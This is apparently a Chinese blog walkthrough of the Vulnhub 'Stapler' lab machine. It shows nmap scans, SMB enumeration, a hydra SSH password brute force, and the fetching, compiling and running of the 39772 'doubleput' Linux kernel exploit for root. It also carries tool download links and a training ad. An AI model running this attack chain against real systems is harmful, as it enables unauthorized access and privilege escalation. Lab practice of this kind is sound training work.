首页 > 其他分享 >靶场奇妙记之Stapler

靶场奇妙记之Stapler

时间:2024-12-26 23:31:50浏览次数:6  
标签:39772 Stapler 192.168 tcp 泷羽 记之 靶场 open 20.152

公众号:泷羽Sec-Ceo


声明!
        学习视频来自B站up主 **泷羽sec** 有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!有兴趣的小伙伴可以点击下面连接进入b站主页[B站泷羽sec](https://space.bilibili.com/350329294)


系统和工具

        链接:https://pan.quark.cn/s/7c366373a85e
                提取码:5cuD

        链接:https://pan.baidu.com/s/1Rn7mA_-aEh60L_iX4PWjzg?pwd=2w25 
                提取码:2w25
        解压密码:SecCeo或Sec工具

        

        所提供的工具资料仅供学习之用。这些资料旨在帮助用户增进知识、提升技能,并促进个人成长与学习。用户在使用这些资料时,应严格遵守相关法律法规,不得将其用于任何非法、欺诈、侵权或其他不当用途。本人和团队不对用户因使用这些资料而产生的任何后果负责,包括但不限于因操作不当、误解资料内容或违反法律法规而导致的损失或损害。用户应自行承担使用这些资料的风险,并在使用前进行充分的了解和评估。


        团队目前在筹备OSCP+的培训,费用4000,跟其他培训比,泷羽Sec绝对优惠,泷羽Sec的泷老师,是一名资深高级红队队长,拥有OSEP,CISSP,OSCP等等含金量极高的证书。报名可以在”泷羽Sec-Ceo“咨询一下

 

突破边界

主机发现

nmap -sP 192.168.20.0/24

       Nmap scan report for 192.168.20.152

扫描端口

nmap -sV -p 1-65535 192.168.20.152

       20/tcp    closed ftp-data

       21/tcp    open   ftp         vsftpd 2.0.8 or later

       22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)

       53/tcp    open   domain      dnsmasq 2.75

       80/tcp    open   http        PHP cli server 5.5 or later

       123/tcp   closed ntp

       137/tcp   closed netbios-ns

       138/tcp   closed netbios-dgm

       139/tcp   open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

       666/tcp   open   doom?

       3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1

       12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))

枚举smb

enum4linux -a 192.168.20.152

       可访问目录

       //192.168.20.152/kathy  Mapping: OK Listing: OK Writing: N/A

       //192.168.20.152/tmp    Mapping: OK Listing: OK Writing: N/A

        用户

筛选用户

复制到user.txt

vi user.txt

cat user.txt | cut -d '\' -f2 | cut -d ' ' -f1 >user2.txt

爆破ssh

hydra -L user2.txt -P user2.txt 192.168.20.152 ssh

       [22][ssh] host: 192.168.20.152   login: SHayslett   password: SHayslett

ssh登录

ssh SHayslett@192.168.20.152

提权

查看系统信息

uname -a

        Linux 4.4.0-21

查找漏洞

searchsploit linux 4.4

searchsploit linux 4.4 -m 39772

查看文件

cat 39772.txt

下载文件

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

传输文件

service apache2 start

cp 39772.zip /var/www/html

目标主机下载文件

wget http://192.168.20.102/39772.zip

解压文件

unzip 39772.zip

cd 39772

tar -xvf exploit.tar

cd ebpf_mapfd_doubleput_exploit/

添加权限

chmod 777 compile.sh

chmod 777 doubleput.c

chmod 777 hello.c

chmod 777 suidhelper.c

提权

        执行compile.sh

./compile.sh

       生成doubleput

        执行doubleput

./doubleput

提权成功

标签:39772,Stapler,192.168,tcp,泷羽,记之,靶场,open,20.152
From: https://blog.csdn.net/LYZ_2108921628/article/details/144754924

相关文章

  • Unity笔记之MVVM框架推荐
    前言:mvvm框架不用不知道,一用发现这玩意还是挺好的,就是第一次的时候比较麻烦。以后维护或者换皮之类的老方便了。[设计思路,还是挺有用的,umvvm](https://www.cnblogs.com/OceanEyes/p/unity3d_framework_designing_get_started_with_mvvm_part1.html#_label3)[良心,还在维护者呢,老......
  • GO 学习笔记之五 编程(三)单元测试 ( VSCODE工具运行 )
    一、目的   当本地写好了一个go文件之后,希望通过单元测试来验证写的go文件中代码逻辑是否正确,减少后期发现问题成本。本案例介绍如何在VSCODE工具中触发执行和单点debug执行单元测试函数(注意:VSCODE工具有一个致命不好的点就是慢)二、编写单元测试  假设:当前业务逻辑go......
  • Vulnhub 靶场 N00b: 1
    先下载靶机靶机地址:https://www.vulnhub.com/entry/noob-1,746/收集信息1.发现靶机IP首先查看kaili的IP靶机要和kali在同一模式下(NAT)靶机ip arp-scan--interface=eth0--localnet 这里也是找到了IP2.端口扫描 nmap -sS-sV-T4-A-p-192.168.239.9......
  • Vnlhun靶场Log4j2漏洞
    相关概念log4j2是Apache的⼀个java日志框架,我们借助它进行日志相关操作管理,然而在2021年末log4j2爆出了远程代码执行漏洞,属于严重等级的漏洞漏洞原理简单说就是当你使⽤log4j2中提供的⽅法去输出⽇志信息时,⽐如说最常⻅的:Stringa="变量输⼊"JNDI注入介绍JNDI,中⽂名叫j......
  • xml靶场实战
    实战一:http://172.16.0.87获得c:/flag/flag进入网站,随便输入一个账号和密码在burpsuite中拦截请求,并构建xml声明,从而得到结果实战二:把xxe靶场压缩包下载到电脑,ovf文件双击导入虚拟机,即可安装成功,然后扫描网段发现靶机ip,apache默认页面即为靶机地址。获得最终的flag安装虚......
  • 文件解析漏洞靶场实战
    1.IIS6.X安装windows2003和IIS6.X环境,进入inetpub/wwwroot目录下,创建一个.asp后缀的文件创建一个后缀为.jpg的文件,写入一句话,显示当前时间查看IP地址,在浏览器访问.jpg文件2.IIS7.X开启IIS7.X,并修改php.ini里面的配置文件修改windows系统中的IIS服务,并重启PHPstudy......
  • niushop开源商城靶场------漏洞检测攻略
    一,搭建靶场把安装包放到小p的根目录里打开小皮的apache和MySQL服务打开浏览器访问http://127.0.0.1/bachangone/niushop-master/安装靶场二,访问首页、安装完会有跳转,可以直接打开首页和后台http://127.0.0.1/bachangone/niushop-master/index.php打开之后先注册一个......
  • niushop开源商城靶场漏洞
    文件上传漏洞先注册一个账号来到个人信息修改个人头像选择我们的马#一句话(不想麻烦的选择一句话也可以)<?php@eval($_POST["cmd"]);?>#生成h.php文件<?phpfputs(fopen('h.php','w'),'<?php@eval($_POST["cmd"]);?>');?>在BP中进行抓包,改为1.php......
  • upload-labs靶场通关攻略
    第一关在靶场文件夹中新建一个uoload文件夹创建一个木马文件上传,提示文件类型错误在浏览器页面按F12,点击箭头找到上传框的代码,删掉returncheckFile再次上传找到木马的地址链接蚁剑进入连接,成功第二关需要把木马文件改为jpg,利用抓包工具抓包jpg改为php放行......
  • DC-1靶场渗透过程详解
    主机发现与端口扫描打开DC-1,确认与主机在同一网段,查看mac地址查看DC-1靶机ip地址sudoarp-scan-l  扫描具体端口信息sudonmap-A-p--sS-sC-T4192.168.100.129端口信息22/tcpopensshOpenSSH6.0p1Debian4+deb7u7(protocol2.0)80/tcpopenhttpApache......